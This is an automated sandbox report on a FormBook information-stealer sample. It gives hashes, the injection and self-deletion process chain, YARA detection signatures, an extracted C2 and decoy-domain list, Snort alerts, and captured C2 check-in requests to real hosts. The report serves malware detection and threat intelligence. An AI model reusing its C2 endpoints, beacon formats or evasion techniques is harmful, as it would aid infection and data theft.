Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 4oItdZkNOZ.exe

Overview

General Information

Sample Name:4oItdZkNOZ.exe
Analysis ID:385307
MD5:36cf33e57ccccf3754b57ab14e623e57
SHA1:f54422966fd1e5f8180f618a51c938372d3711be
SHA256:9914c8ad9ea0318f57214c6eb2f2e3f891b71ba054a9de071432ec92eb6bfe0d
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 4oItdZkNOZ.exe (PID: 4744 cmdline: 'C:\Users\user\Desktop\4oItdZkNOZ.exe' MD5: 36CF33E57CCCCF3754B57AB14E623E57)
    • 4oItdZkNOZ.exe (PID: 3540 cmdline: 'C:\Users\user\Desktop\4oItdZkNOZ.exe' MD5: 36CF33E57CCCCF3754B57AB14E623E57)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 5708 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 4928 cmdline: /c del 'C:\Users\user\Desktop\4oItdZkNOZ.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.th0rgramm.com/hx3a/"], "decoy": ["xn--ol-xia.com", "gracieleesgiftsandmore.com", "invenufas.com", "nexgencoder.com", "virginiabrightseleccion.com", "selectenergyservicestx.com", "warchocki.com", "xn--comercialvioo-tkb.website", "losangelesbraiders.com", "skaraonline.com", "freeworldsin.com", "jabberjawmobile.com", "orgoneartist.com", "xyfzfl.com", "arooko.com", "investmentpartners.limited", "ugonget.com", "ringforklift.com", "recovatek.com", "bukannyaterbuai24.com", "formula-kuhni.com", "cyfss.com", "stkify.com", "aksharnewtown.com", "libroricardoanaya.com", "phillhutt.com", "mywinnersworld.com", "school17obn.com", "cocoshop.info", "netzcorecloud.com", "bookbeachchairs.com", "summitsolutionsnow.com", "yakudatsu-hikaku.com", "elitedrive.net", "jjwheelerphotography.com", "motcamket.com", "hatikuturkila.com", "tonton-koubou.com", "roughcuttavernorder.com", "leagueofconsciouscreatives.com", "worldsabroad.com", "ezmodafinil.com", "apettelp.club", "xn--jvrr98g37n88d.com", "gobiodisc.com", "alliedcds.com", "jillspickles.com", "alfenas.info", "herbalyesman.xyz", "sugary-sweet.com", "rigscart.com", "curiget.xyz", "stacksyspro.net", "sxqyws.net", "solocubiertos.com", "actuualizarinfruma.com", "thecurmudgeonsspeakout.com", "paydaegitimkurumlari.com", "sellingdealsinheels.com", "dezhou8.xyz", "thelitigatorsbookclub.com", "rainbowsdepot.com", "serenityislegalveston.com", "contactredzonetalent.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.4oItdZkNOZ.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.4oItdZkNOZ.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.4oItdZkNOZ.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        1.1.4oItdZkNOZ.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.1.4oItdZkNOZ.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.aksharnewtown.com/hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&6l=t8eTzfA8rB7pyAvira URL Cloud: Label: malware
          Source: http://www.alliedcds.com/hx3a/?6l=t8eTzfA8rB7py&yvLp6=3BonITYdxMn0gLM+WELVYgnSp+qYa6n19HgYUH50ozUw04GLDm+bjpbdD44/kvkXlDtuAUMMsA==Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.th0rgramm.com/hx3a/"], "decoy": ["xn--ol-xia.com", "gracieleesgiftsandmore.com", "invenufas.com", "nexgencoder.com", "virginiabrightseleccion.com", "selectenergyservicestx.com", "warchocki.com", "xn--comercialvioo-tkb.website", "losangelesbraiders.com", "skaraonline.com", "freeworldsin.com", "jabberjawmobile.com", "orgoneartist.com", "xyfzfl.com", "arooko.com", "investmentpartners.limited", "ugonget.com", "ringforklift.com", "recovatek.com", "bukannyaterbuai24.com", "formula-kuhni.com", "cyfss.com", "stkify.com", "aksharnewtown.com", "libroricardoanaya.com", "phillhutt.com", "mywinnersworld.com", "school17obn.com", "cocoshop.info", "netzcorecloud.com", "bookbeachchairs.com", "summitsolutionsnow.com", "yakudatsu-hikaku.com", "elitedrive.net", "jjwheelerphotography.com", "motcamket.com", "hatikuturkila.com", "tonton-koubou.com", "roughcuttavernorder.com", "leagueofconsciouscreatives.com", "worldsabroad.com", "ezmodafinil.com", "apettelp.club", "xn--jvrr98g37n88d.com", "gobiodisc.com", "alliedcds.com", "jillspickles.com", "alfenas.info", "herbalyesman.xyz", "sugary-sweet.com", "rigscart.com", "curiget.xyz", "stacksyspro.net", "sxqyws.net", "solocubiertos.com", "actuualizarinfruma.com", "thecurmudgeonsspeakout.com", "paydaegitimkurumlari.com", "sellingdealsinheels.com", "dezhou8.xyz", "thelitigatorsbookclub.com", "rainbowsdepot.com", "serenityislegalveston.com", "contactredzonetalent.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nsv773C.tmp\m9c3uhgbfqo.dllReversingLabs: Detection: 10%
          Multi AV Scanner detection for submitted fileShow sources
          Source: 4oItdZkNOZ.exeVirustotal: Detection: 30%Perma Link
          Source: 4oItdZkNOZ.exeReversingLabs: Detection: 33%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.604139164.0000000002B50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.603084616.0000000000300000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.388146852.00000000009F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.350827650.00000000026A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.345961312.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.387799349.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.387989609.00000000006A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.4oItdZkNOZ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.4oItdZkNOZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.4oItdZkNOZ.exe.26a0000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpack, type: UNPACKEDPE
          Source: 1.2.4oItdZkNOZ.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.4oItdZkNOZ.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.4oItdZkNOZ.exe.26a0000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.cscript.exe.4784e8.2.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 3.2.cscript.exe.4f57960.5.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 4oItdZkNOZ.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: cscript.pdbUGP source: 4oItdZkNOZ.exe, 00000001.00000002.388207380.0000000000A60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.366018539.0000000007AA0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 4oItdZkNOZ.exe, 00000000.00000003.341988783.000000001EFD0000.00000004.00000001.sdmp, 4oItdZkNOZ.exe, 00000001.00000002.388229067.0000000000B10000.00000040.00000001.sdmp, cscript.exe, 00000003.00000002.604526316.0000000004B3F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 4oItdZkNOZ.exe, cscript.exe
          Source: Binary string: cscript.pdb source: 4oItdZkNOZ.exe, 00000001.00000002.388207380.0000000000A60000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.366018539.0000000007AA0000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 0_2_004026BC FindFirstFileA,
          Source: C:\Users\user\Desktop\4oItdZkNOZ.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49697 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49697 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49697 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49713 -> 172.67.210.123:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49713 -> 172.67.210.123:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49713 -> 172.67.210.123:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.th0rgramm.com/hx3a/
          Source: global trafficHTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=fCmUcBRhMrUy3w+kl11B/xiypSW2fUD8cU7Pu3gqArK5c3pJn3j9k/DsIYu7GSRGk0uMV4XXlw== HTTP/1.1Host: www.recovatek.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=3BonITYdxMn0gLM+WELVYgnSp+qYa6n19HgYUH50ozUw04GLDm+bjpbdD44/kvkXlDtuAUMMsA== HTTP/1.1Host: www.alliedcds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?yvLp6=brq1n3aPok8cFP+QyTVVGry8TF4KLIKYulSDbrE0IIbdXAl5b54voPCnFdnaruz10AJ9JKXZsg==&6l=t8eTzfA8rB7py HTTP/1.1Host: www.investmentpartners.limitedConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=gkm2pEh8KEmpulawdvJ1V43zAdeU214KS2HTFZoK2O2SsOEqfkF7FZJwvCYR1UF8Rs6N914p1Q== HTTP/1.1Host: www.stacksyspro.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&6l=t8eTzfA8rB7py HTTP/1.1Host: www.aksharnewtown.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpQ9kpTkv8g1Bmau5WA== HTTP/1.1Host: www.tonton-koubou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?yvLp6=caEAE6TOQuxSMBR5BS8nf+GDaIfP+W5I+A7g/UPOg7+JEug9q1NgoLt4ZSWomvYtgt6I+7SvKg==&6l=t8eTzfA8rB7py HTTP/1.1Host: www.formula-kuhni.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?yvLp6=o+3wYjNifdE6FKE0bOiznyo8jGn7vjVVrJpNZHKkq7PaCapngpRQoMcVskl66UoDGo5EztP+UQ==&6l=t8eTzfA8rB7py HTTP/1.1Host: www.xn--ol-xia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=qBahC4CKT3yOn5twSoz5N4YsmdYqg0jdF6L89PfdPPedh7rnw+4FXiJe9HO6V7yUZIpJ8/Yz5A== HTTP/1.1Host: www.ugonget.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?yvLp6=cNQmpavEJfLRVSDxdHUFAARwayWBvklnexOaeKif2gi+yGNN3QCAF1RUuDonfjyO2vX8uvakBQ==&6l=t8eTzfA8rB7py HTTP/1.1Host: www.jabberjawmobile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1w7wouCbacCZl2dqvUI+ajsT2GFRHOaP55G6g== HTTP/1.1Host: www.yakudatsu-hikaku.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: INTERQGMOInternetIncJP INTERQGMOInternetIncJP
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: WEBHOST1-ASRU WEBHOST1-ASRU
          Source: global trafficHTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=fCmUcBRhMrUy3w+kl11B/xiypSW2fUD8cU7Pu3gqArK5c3pJn3j9k/DsIYu7GSRGk0uMV4XXlw== HTTP/1.1Host: www.recovatek.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=3BonITYdxMn0gLM+WELVYgnSp+qYa6n19HgYUH50ozUw04GLDm+bjpbdD44/kvkXlDtuAUMMsA== HTTP/1.1Host: www.alliedcds.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?yvLp6=brq1n3aPok8cFP+QyTVVGry8TF4KLIKYulSDbrE0IIbdXAl5b54voPCnFdnaruz10AJ9JKXZsg==&6l=t8eTzfA8rB7py HTTP/1.1Host: www.investmentpartners.limitedConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=gkm2pEh8KEmpulawdvJ1V43zAdeU214KS2HTFZoK2O2SsOEqfkF7FZJwvCYR1UF8Rs6N914p1Q== HTTP/1.1Host: www.stacksyspro.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?yvLp6=UKCdSLR+lyrQbbbCP2MhlUsk7yfSGMFZEurQt1OYEDE1Z8eZbIDIkuaz0L4nWes64WGYrYxAqg==&6l=t8eTzfA8rB7py HTTP/1.1Host: www.aksharnewtown.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=vULSFbXUfWqfH/UQKANXmh//LRVD9fF+bm7wgJ2FfsCiVE70xyhWGRMHpQ9kpTkv8g1Bmau5WA== HTTP/1.1Host: www.tonton-koubou.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?yvLp6=caEAE6TOQuxSMBR5BS8nf+GDaIfP+W5I+A7g/UPOg7+JEug9q1NgoLt4ZSWomvYtgt6I+7SvKg==&6l=t8eTzfA8rB7py HTTP/1.1Host: www.formula-kuhni.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?yvLp6=o+3wYjNifdE6FKE0bOiznyo8jGn7vjVVrJpNZHKkq7PaCapngpRQoMcVskl66UoDGo5EztP+UQ==&6l=t8eTzfA8rB7py HTTP/1.1Host: www.xn--ol-xia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=qBahC4CKT3yOn5twSoz5N4YsmdYqg0jdF6L89PfdPPedh7rnw+4FXiJe9HO6V7yUZIpJ8/Yz5A== HTTP/1.1Host: www.ugonget.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?yvLp6=cNQmpavEJfLRVSDxdHUFAARwayWBvklnexOaeKif2gi+yGNN3QCAF1RUuDonfjyO2vX8uvakBQ==&6l=t8eTzfA8rB7py HTTP/1.1Host: www.jabberjawmobile.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hx3a/?6l=t8eTzfA8rB7py&yvLp6=tI3SrGzIvW6pivz42JGLXvW3gzDpE2zUYLW8n1w7wouCbacCZl2dqvUI+ajsT2GFRHOaP55G6g== HTTP/1.1Host: www.yakudatsu-hikaku.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.recovatek.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 12 Apr 2021 08:04:03 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 19Connection: closeData Raw: 34 30 34 20 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: 404 File not found.
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000002.603524845.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.369274696.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
